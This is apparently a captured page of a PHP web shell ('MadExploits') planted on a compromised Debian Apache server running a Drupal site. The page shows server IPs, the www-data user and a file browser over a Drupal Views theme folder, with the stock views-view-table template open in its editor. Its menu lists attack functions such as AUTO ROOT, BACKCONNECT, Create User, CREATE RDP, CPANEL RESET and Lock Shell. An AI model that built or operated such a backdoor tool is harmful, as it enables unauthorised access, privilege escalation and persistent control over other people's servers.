Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 3.143.24.110
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
theme /
[ HOME SHELL ]
Name
Size
Permission
Action
theme.inc
38.53
KB
-rw-r--r--
views-exposed-form.tpl.php
2.8
KB
-rw-r--r--
views-more.tpl.php
310
B
-rw-r--r--
views-ui-display-tab-bucket.tp...
391
B
-rw-r--r--
views-ui-display-tab-setting.t...
428
B
-rw-r--r--
views-ui-edit-item.tpl.php
1.12
KB
-rw-r--r--
views-ui-edit-view.tpl.php
1.47
KB
-rw-r--r--
views-view-field.tpl.php
796
B
-rw-r--r--
views-view-fields.tpl.php
1.44
KB
-rw-r--r--
views-view-grid.tpl.php
980
B
-rw-r--r--
views-view-grouping.tpl.php
786
B
-rw-r--r--
views-view-list.tpl.php
599
B
-rw-r--r--
views-view-row-comment.tpl.php
602
B
-rw-r--r--
views-view-row-rss.tpl.php
312
B
-rw-r--r--
views-view-rss.tpl.php
565
B
-rw-r--r--
views-view-summary-unformatted...
771
B
-rw-r--r--
views-view-summary.tpl.php
533
B
-rw-r--r--
views-view-table.tpl.php
1.99
KB
-rw-r--r--
views-view-unformatted.tpl.php
384
B
-rw-r--r--
views-view.tpl.php
2.2
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views-view-table.tpl.php
<?php /** * @file * Template to display a view as a table. * * - $title : The title of this group of rows. May be empty. * - $header: An array of header labels keyed by field id. * - $caption: The caption for this table. May be empty. * - $header_classes: An array of header classes keyed by field id. * - $fields: An array of CSS IDs to use for each field id. * - $classes: A class or classes to apply to the table, based on settings. * - $row_classes: An array of classes to apply to each row, indexed by row * number. This matches the index in $rows. * - $rows: An array of row items. Each row is an array of content. * $rows are keyed by row number, fields within rows are keyed by field ID. * - $field_classes: An array of classes to apply to each field, indexed by * field id, then row number. This matches the index in $rows. * @ingroup views_templates */ ?> <table <?php if ($classes) { print 'class="'. $classes . '" '; } ?><?php print $attributes; ?>> <?php if (!empty($title) || !empty($caption)) : ?> <caption><?php print $caption . $title; ?></caption> <?php endif; ?> <?php if (!empty($header)) : ?> <thead> <tr> <?php foreach ($header as $field => $label): ?> <th <?php if ($header_classes[$field]) { print 'class="'. $header_classes[$field] . '" '; } ?>> <?php print $label; ?> </th> <?php endforeach; ?> </tr> </thead> <?php endif; ?> <tbody> <?php foreach ($rows as $row_count => $row): ?> <tr <?php if ($row_classes[$row_count]) { print 'class="' . implode(' ', $row_classes[$row_count]) .'"'; } ?>> <?php foreach ($row as $field => $content): ?> <td <?php if ($field_classes[$field][$row_count]) { print 'class="'. $field_classes[$field][$row_count] . '" '; } ?><?php print drupal_attributes($field_attributes[$field][$row_count]); ?>> <?php print $content; ?> </td> <?php endforeach; ?> </tr> <?php endforeach; ?> </tbody> </table>
Close